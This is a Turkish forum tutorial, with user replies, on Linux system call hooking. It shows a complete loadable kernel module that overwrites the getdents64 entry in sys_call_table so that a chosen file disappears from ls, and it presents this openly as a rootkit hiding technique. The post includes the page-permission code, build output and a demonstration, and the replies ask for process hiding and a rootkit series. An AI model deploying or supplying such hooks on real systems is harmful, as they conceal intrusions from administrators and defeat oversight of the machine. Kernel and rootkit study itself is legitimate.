Linux System Call Hooking

Linux System Call Hooking​

Merhaba arkadaşlar Linux System Call Hooking isimli yazıma hoşgeldiniz.

Bu yazımda sizlere türkçe adı ile Sistem Çağrısı Kancalama ‘yı anlatacağım.

System Call nedir kısmına gelmeden önce rootkit ‘lerin System Call Hooking ‘i neden sıklıkla kullandığını anlatayım.

Örneğin düşünelim ki bir Rootkit yazdık ve bu Rootkit ‘in sistem içerisinde kendini gizlemesi lazım zaten rootkit ‘lerin en büyük gereksinimlerinden biri kendini gizlemesi.

Diyelim ki ls komutu çalıştığında Rootkit ‘imiz gösterilmesin istiyoruz. Bunun için bizim ls komutunun içerisindeki System Call ‘leri Hook edip ls komutu çalıştığında gelen liste içerisinde bizim komutumuzu gizlemek.

İlerideki kısımlarda basitce bunu yapacağız ama ondan önce System Call kavramının ne olduğunu öğrenelim.

Aklınızda ingilizce olarak kalmasını istediğimden buradaki terimleri ingilizce kullanarak devam edicem anlatmaya.

System Call ‘lerini aşşağıda ki resimden anlatmaya başlayalım yavaşca :

f1df0fefd9155604b8a9eeef1c76d69c6d8ab9ac.gif


Öncelike bizim Executable ‘ımız Library Functions ‘a gider program içerisinde kullanılacak fonksiyonları almak için yada direk olarak System call ‘larına başvurur resimde de görebildiğiniz gibi.

Ayrıca resimde ki okları takip edersek şayet bu System Call ‘ların Kernel ‘e sonrasında ise Hardware ‘e bağlandığını gözlemleyebiliriz.

System Call ‘lerin neler olduğunu soracak olursanız aşşağıda bir kaçını listeleyen bir resim bırakıyorum. Tüm sistem çağrılarına yani System Call ‘lara ulaşmak istiyorsanız resmin üstüne de fotorafı aldığım web siteyi bırakacağım.

Linux Syscall Reference 2

MVO54g
MVO54g957×331 20.6 KBYani daha basite indirge edersek şayet System Call ‘leri bir program içerisinde kullandığımız örneğin printf gibi bir Library Function ‘unun sistem’e uyarlanmış halidir.

System Call ‘lerini anladığımıza göre Hooking terimine geçebiliriz. Bu terimi daha önce yazdığım blogum olan Linux Function Hooking 2 içerisinde anlattım o yüzden bu blogumda anlatmıyacağım.

Şimdi gelelim bilalin topu kaleye nasıl soktuğuna, pardon pardon bu başka konuydu… yine karıştırdım.

Gelelim System Call ‘lerinin nasıl Hook edildiğine.

Aslında bu konuda daha önce anlattığım Function Hooking ‘e çok benzer bir konu. Aralarında ki bir kaç fark birinin User-mode içerisinde bu yazının ise Kernel-mode içerisinde geçmesi.

GmdQVV


Buraya birde User-mode ve Kernel-mode arasındaki farkları anlatan bir stackoverflow çözümünü bırakıyorum : User vs Kernel

System Call Trace​

Şayet bir Executable içerisinde bulunan System Call ‘leri yakalamak ve incelemek istiyorsak linux içerisinde bulunan strace komutumuz bize çok yardımcı olacaktır.

Nasıl çalıştığını bilmeyen arkadaşlar için buraya strace komutunu anlatan bir yazı bırakıyorum : Strace

LS komutunu hook etme​

Öncelik ile ls komutunun hangi System Call ‘lerini içerdiğini görmek için strace komutunu kullanıyoruz ve çıktımız şu şekilde oluyor :

Biraz uzun olduğu için pastebin’e ekledim çıktıyı : Strace çıktısı 3

Bu çıktının içerisinde gözümüze çarpan bir sürü System Call mevcut olan ve dizin girişlerini alan getdents64 sistem çağrısı ilgimizi çekiyor ve man page‘ini incelediğimizde görebiliriz ki :

int getdents(unsigned int fd, struct linux_dirent *dirp,
unsigned int count);

4 adet argüman alıyor ama bu argümanların içerisinde bir structure yani bir yapı olan linux_dirent64 diğerlerinden farklı olarak ls komutu çalıştıktan sonra gelen listeyi döndürüyor :

struct linux_dirent {
unsigned long d_ino; /* Inode number */
unsigned long d_off; /* Offset to next linux_dirent */
unsigned short d_reclen; /* Length of this linux_dirent */
char d_name[]; /* Filename (null-terminated) */
/* length is actually (d_reclen - 2 -
offsetof(struct linux_dirent, d_name)) */
/*
char pad; // Zero padding byte
char d_type; // File type (only since Linux
// 2.6.4); offset is (d_reclen - 1)
*/
}

Ayrıca man page içerisinde bu System Call ‘ın readdir.c içerisinde kullanıldığını görebiliyoruz.

Artık bundan sonrası LKM yani Loadable Kernel Module development’e giriyor ve bunun ne olduğunu bilmeyen arkadaşlarımız varsa aramızda onlar içinde bir yazı yazdım.

Buradan ulaşabilirsiniz : Loadable Kernel Module Development

System Call Hooking İçin LKM Geliştirmek​

Strace komutunu kullanıp ls içerisinden getdents64 sistem çağrısını incelersek şayet:

deadbeef@pop-os:~$ strace ls 2>&1 | grep getdents64
getdents64(3, /* 30 entries */, 32768) = 960
getdents64(3, /* 0 entries */, 32768) = 0
deadbeef@pop-os:~$

30 adet entry olduğunu görebiliriz bulunduğumuz klasör içerisinde. Doğrulamak için de wc komutunu kullanabiliriz :

deadbeef@pop-os:~$ ls -la | wc -l
30

Şimdi elde ettiğimiz tüm bu bilgiler ile LKM ‘mizi geliştirmeye başlayalım yavaştan.

Bu kısımı çok basit anlatacağım aramızda anlamakta zorlanan arkadaşlar olur diye.

Ve tam anlatmaya başlarken kız arkadaşım kabus görüp kalkıyor.

Evet onu yatıştırdıktan sonra yazıya devam edebilirim.

Öncelikle kütüphanelerimizi ekleyelim :

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/moduleparam.h>
#include <linux/unistd.h>
#include <linux/semaphore.h>
#include <linux/dirent.h>
#include <asm/cacheflush.h>

Sonrasında yazacağımız LKM ‘nin detaylarını girelim :

MODULE_AUTHOR("blacknbunny");
MODULE_DESCRIPTION("LS Komutundan cokgizlidosya.txt yi gizlemek");
MODULE_LICENSE("GPL");

İleride daha detaylı anlatacağım sys_call_table :

void **sys_call_table;

LS komutundan saklayacağımız dosya :

#define DOSYA_ISMI "cokgizlidosya.txt"

Orjinal getdents64 sistem çağrısı :

asmlinkage int (*org_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

Bu orjinal sistem çağrısı yerine bizim aktaracağımız hookumuz :

asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
int returnval;
struct linux_dirent64 *cur = dirp;
int i = 0;
returnval = org_getdents64(fd, dirp, count);
while (i < returnval) {
if (strncmp(cur->d_name, DOSYA_ISMI, strlen(DOSYA_ISMI)) == 0) {
int reclen = cur->d_reclen;
char *next_rec = (char *)cur + reclen;
int len = (int)dirp + returnval - (int)next_rec;
memmove(cur, next_rec, len);
returnval -= reclen;
continue;
}
i += cur->d_reclen;
cur = (struct linux_dirent*) ((char*)dirp + i);
}
return returnval;
}

Tüm bilgileri toplayıp birleştirdikten sonra bu hooku yazdım.

Hooku basitce açıklayacak olursam. linux_dirent64 struct ‘u üzerinde bir döngü oluşturduk ve her bir dosya ismini aradık.

Bizim belirttiğimiz gizlenilecek dosya ile aynı ismi taşıyorsa bunu ls komutunda gösterme dedik.

System Call Table​

Şimdi geldik değirmenin döndüğü yere.

System Call Table yani sys_call_table kernelin içerdiği tüm sistem çağrılarını tutar. Aynı zamanda hafıza yani memory içerisinde nerede olduğunu bize gösterir.

System Call Table ‘nin adresini linux içerisinde bulmamız gerek ki gerçek System Call ile bizim yazdığımız sahte Hook sistem çağrısını değiştirebilelim.

Ve bu şekilde her ls komutu çalıştığında gerçek getdents64 sistem çağrısı yerine bizim hook_getdents64 sistem çağrımız çalışıcak.

Yazdığımız hook belirttiğimiz dosyayı gizlemeye yaradığından ls komutu çalıştığında hiçbir şekilde görülemeyecek.

sys_call_table ‘nin adresini bulmak için /boot içerisinde bulunan System.map ‘e bakmamız gerekiyor :

deadbeef@pop-os:~$ sudo grep sys_call_table /boot/System.map-`uname -r`
ffffffff820001c0 R sys_call_table
ffffffff820015a0 R ia32_sys_call_table

Ve bu şekilde sys_call_table ‘mizin adresini bulduk ffffffff820001c0

Şimdide bu sys_call_table ‘ı yazılabilir yapmamız gerek ki asıl sistem çağrısı ile bizim sahte yani Hook sistem çağrısını değiştirebilelim.

Bunuda yapmak için vereceğimiz sys_call_table adresinin table entry ‘sini manual olarak writable yapmamız gerek.

Bu stackoverflow sorusunun cevaplarında bunu yapmak için bir sürü teknik var bakmak isterseniz : StackOverflow sys_call_table

Bunuda lookup_address fonksiyonu ile page table ‘nin adresini bulup sonrasında içerisinde sys_call_table ‘ye yazma yetkisi vermeliyiz :

int set_page_rw(unsigned long addr)
{
unsigned int level;
pte_t *pte = lookup_address(addr, &level);
if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
return 0;
}

Günün sonunda bu yazdığımız LKM ‘yi kernel ‘e yükleyeceğiz fakat sonrasında bunu sildiğimizde herşeyin tekrar aynı haline dönmesi olayıda var birde.

Bunun içinde eğer sys_call_table ‘yi tekrardan Read-Only yapmak istiyorsak yine aynı tekniği kullanabiliriz :

int set_page_ro(unsigned long addr)
{
unsigned int level;
pte_t *pte = lookup_address(addr, &level);
pte->pte = pte->pte &~_PAGE_RW;
return 0;
}

Yetkilendirmeleri merak edenler varsa arch/x86/include/asm/pgtable_types.h içerisinden küçük bir liste :

#define _PAGE_BIT_PRESENT 0 /* is present */
#define _PAGE_BIT_RW 1 /* writeable */
#define _PAGE_BIT_USER 2 /* userspace addressable */
#define _PAGE_BIT_PWT 3 /* page write through */
#define _PAGE_BIT_PCD 4 /* page cache disabled */
#define _PAGE_BIT_ACCESSED 5 /* was accessed (raised by CPU) */
#define _PAGE_BIT_DIRTY 6 /* was written to (raised by CPU) */
#define _PAGE_BIT_PSE 7 /* 4 MB (or 2MB) page */
#define _PAGE_BIT_PAT 7 /* on 4KB pages */
#define _PAGE_BIT_GLOBAL 8 /* Global TLB entry PPro+ */
#define _PAGE_BIT_UNUSED1 9 /* available for programmer */
#define _PAGE_BIT_IOMAP 10 /* flag used to indicate IO mapping */
#define _PAGE_BIT_HIDDEN 11 /* hidden by kmemcheck */
#define _PAGE_BIT_PAT_LARGE 12 /* On 2MB or 1GB pages */
#define _PAGE_BIT_SPECIAL _PAGE_BIT_UNUSED1
#define _PAGE_BIT_CPA_TEST _PAGE_BIT_UNUSED1
#define _PAGE_BIT_SPLITTING _PAGE_BIT_UNUSED1 /* only valid on a PSE pmd */
#define _PAGE_BIT_NX 63 /* No execute: only valid after cpuid check */
#define _PAGE_PRESENT (_AT(pteval_t, 1) << _PAGE_BIT_PRESENT)
#define _PAGE_RW (_AT(pteval_t, 1) << _PAGE_BIT_RW)
#define _PAGE_USER (_AT(pteval_t, 1) << _PAGE_BIT_USER)
#define _PAGE_PWT (_AT(pteval_t, 1) << _PAGE_BIT_PWT)
#define _PAGE_PCD (_AT(pteval_t, 1) << _PAGE_BIT_PCD)
#define _PAGE_ACCESSED (_AT(pteval_t, 1) << _PAGE_BIT_ACCESSED)
#define _PAGE_DIRTY (_AT(pteval_t, 1) << _PAGE_BIT_DIRTY)
#define _PAGE_PSE (_AT(pteval_t, 1) << _PAGE_BIT_PSE)
#define _PAGE_GLOBAL (_AT(pteval_t, 1) << _PAGE_BIT_GLOBAL)
#define _PAGE_UNUSED1 (_AT(pteval_t, 1) << _PAGE_BIT_UNUSED1)
#define _PAGE_IOMAP (_AT(pteval_t, 1) << _PAGE_BIT_IOMAP)
#define _PAGE_PAT (_AT(pteval_t, 1) << _PAGE_BIT_PAT)
....
#define _PAGE_PAT_LARGE (_AT(pteval_t, 1) << _PAGE_BIT_PAT_LARGE)
#define _PAGE_SPECIAL (_AT(pteval_t, 1) << _PAGE_BIT_SPECIAL)
#define _PAGE_CPA_TEST (_AT(pteval_t, 1) << _PAGE_BIT_CPA_TEST)
#define _PAGE_SPLITTING (_AT(pteval_t, 1) << _PAGE_BIT_SPLITTING)

Modül yüklendiğinde yani insmod çalıştığında :

static int __init getdents_hook_init(void)
{

sys_call_table = (void*)0xffffffff820001c0;
org_getdents64 = sys_call_table[__NR_getdents64];

set_page_rw(sys_call_table);
sys_call_table[__NR_getdents64] = hook_getdents64;
return 0;
}

LKM ‘mizi oluşturup kernel ‘e dahil ettikten sonra çalışacak fonksiyon.

ÖNEMLİ : Buradaki sys_call_table = (void)0xsizinsyscalltableadresiniz;*

Kısmını kendi sys_call_table adresiniz ile değiştirmeniz gerekli.

Nasıl bulacağınızı yukarıda anlatmıştım eğer blog içerisinde bulamadıysanız hemen CTRL + F yapıp System.map bunu arayın orada sys_call_table adresinin nasıl bulunacağını anlattım.

Şimdi geldik eğer bunu silmek istersek kısmına :

static void __exit getdents_hook_exit(void)
{
sys_call_table[__NR_getdents64] = org_getdents64;
set_page_ro(sys_call_table);
return 0;
}

Eğer oluşturduğumuz LKM ‘yi silersek oluşturduğumuz sahte Hook fonksiyonunu sys_call_table ‘den çıkartıp herşeyi tekrar eski haline çevirmesini söylüyoruz programımıza aynı zamanda table entry ‘ide tekrardan Read-Only yapıyoruz.

Şimdi tüm bu yazdığımız kodları tek bir bütün haline almaya geldi sıra hepsini pastebine yüklüyorum. İçerisinden değiştirmeniz gereken tek kısım sys_call_table adresi.

Kod : System Call Hooking Code 1

Make​

Şimdi sıra geldi bu kodu derlemeye.

Makefile isminde bir dosya oluşturun ve yukarıda yazdığımız kodu nasıl kaydettiyseniz burada bulunan syscallhook.o ismini onunla değiştiriniz.

obj-m += syscallhook.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

make komutunu çalıştırıp derledikten sonra çıktımız :

root@heyhey:~/hey# make
make -C /lib/modules/4.4.0-78-generic/build M=/root/hey modules
make[1]: Entering directory `/usr/src/linux-headers-4.4.0-78-generic'
CC [M] /root/hey/syscallhook.o
/root/hey/syscallhook.c: In function ‘hook_getdents64’:
/root/hey/syscallhook.c:36:21: warning: assignment from incompatible pointer type [enabled by default]
cur = (struct linux_dirent*) ((char*)dirp + i);
^
/root/hey/syscallhook.c: In function ‘getdents_hook_init’:
/root/hey/syscallhook.c:63:3: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
set_page_rw(sys_call_table);
^
/root/hey/syscallhook.c:41:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
int set_page_rw(unsigned long addr)
^
/root/hey/syscallhook.c: In function ‘getdents_hook_exit’:
/root/hey/syscallhook.c:71:3: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
set_page_ro(sys_call_table);
^
/root/hey/syscallhook.c:49:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
int set_page_ro(unsigned long addr)
^
/root/hey/syscallhook.c:72:9: warning: ‘return’ with a value, in function returning void [enabled by default]
return 0;
^
Building modules, stage 2.
MODPOST 1 modules
CC /root/hey/syscallhook.mod.o
LD [M] /root/hey/syscallhook.ko
make[1]: Leaving directory `/usr/src/linux-headers-4.4.0-78-generic'

LKM ‘mizi derledikten sonra şimdi sıra geldi ls komutundan kaçıracağımız baştada belirttiğimiz dosya ismini oluşturmaya :

root@heyhey:~/hey# touch cokgizlidosya.txt

Bundan sonrası ziyafet. Şimdi oluşturduğumuz modülü kernel içerisine insmod komutu ile aktaralım :

root@heyhey:~/hey# insmod ./syscallhook.ko

Modülü yüklemeden önce ls komutunun bulduğu dosyalar :

root@heyhey:~/hey# ls
cokgizlidosya.txt Module.symvers syscallhook.mod.c
Makefile syscallhook.c syscallhook.mod.o
modules.order syscallhook.ko syscallhook.o

Modülü yükledikten sonra ls komutunun bulduğu dosyalar :

root@heyhey:~/hey# ls
Makefile Module.symvers syscallhook.ko syscallhook.mod.o
modules.order syscallhook.c syscallhook.mod.c syscallhook.o

Gördüğünüz gibi ls komutundan cokgizlidosya.txt dosyamızı gizlemeyi System Call Table içerisindeki ls komutunun kullandığı sistem çağrılarını hook ederek başardık.

Bu modülü silip herşeyi eski haline çevirmek için :

root@heyhey:~/hey# rmmod syscallhook

Ve bu yazının da sonunda geldik. Umarım açıklayıcı anlatabilmişimdir.

Sorular için twitter hesabım : @0DAYanc

 

BoluBeyi

Gomutan
Yönetici
Elinize sağlık. Resimleriniz görünmüyor. Yurtdışından veya VPNden giriş yapanlar için hizli resim haricinde bir siteden yüklemeniz daha iyi olur.
 

sef

0xffffffxxxxxx
Ellerine sağlık keyifle okudum makaleni buna istinaden “hide process” mevzusu üzerinede durabilir misin ? Yahut her yönüyle bir rootkit makale serisi vs. çok güzel olurdu.
 
Teşekkür ederim. Process’de, ip:port’ta gizlemek aslında bu makale ile bire bir aynı. Sadece farklı noktaları system call yani sistem çağrılarının değişmesi. Makale’de system call hooking’i detaylıca anlattım bu makaleden yola çıkarak bahsedilen hiding techniquelerinin system call’leri hook edilebilir.

Aslında geniş çaplı bir rootkit makale serisi yazıcaktım yalnız şuanda malware analysis serisi var yazmak istediğim bundan sonra belki rootkit serisinide getiririm.
 
Üst